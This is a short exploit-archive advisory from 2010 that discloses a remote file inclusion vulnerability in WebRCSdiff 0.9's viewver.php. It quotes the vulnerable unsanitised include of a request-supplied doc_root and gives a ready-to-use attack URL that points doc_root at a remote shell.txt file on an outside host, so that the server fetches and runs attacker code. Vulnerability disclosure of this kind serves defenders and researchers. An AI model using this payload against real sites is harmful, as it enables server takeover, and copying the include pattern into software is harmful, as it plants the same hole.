WebRCSdiff 0.9 (viewver.php) Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : WebRCSdiff 0.9 (viewver.php) Remote File Inclusion Vulnerability
# Published : 2010-11-18
# Author : Fl0riX
# Previous Title : osCommerce Remote File Upload Vulnerability (/admin/categories.php)
# Next Title : Joomla Component (com_jimtawl) Local File Inclusion Vulnerability

========================================================
= Author: Fl0riX - Bug Researchers

= Application  Name : WebRCSdiff 0.9

= Vulnerable  Type: Remote File Inclusion

= Download: http://sourceforge.net/projects/webrcsdiff/files/webrcsdiff/0.9%20Release/webrcsdiff-0.9.tar.zip/download

= Risk : High

= Infection: Uzaktan Dosya Dahil edilebilir.

========================================================

=
 Error c0d3;
     include ("$doc_root/dir_config.php");

========================================================

=
 Example;
 site/viewver?doc_root=http://fl0rix/shell.txt?
========================================================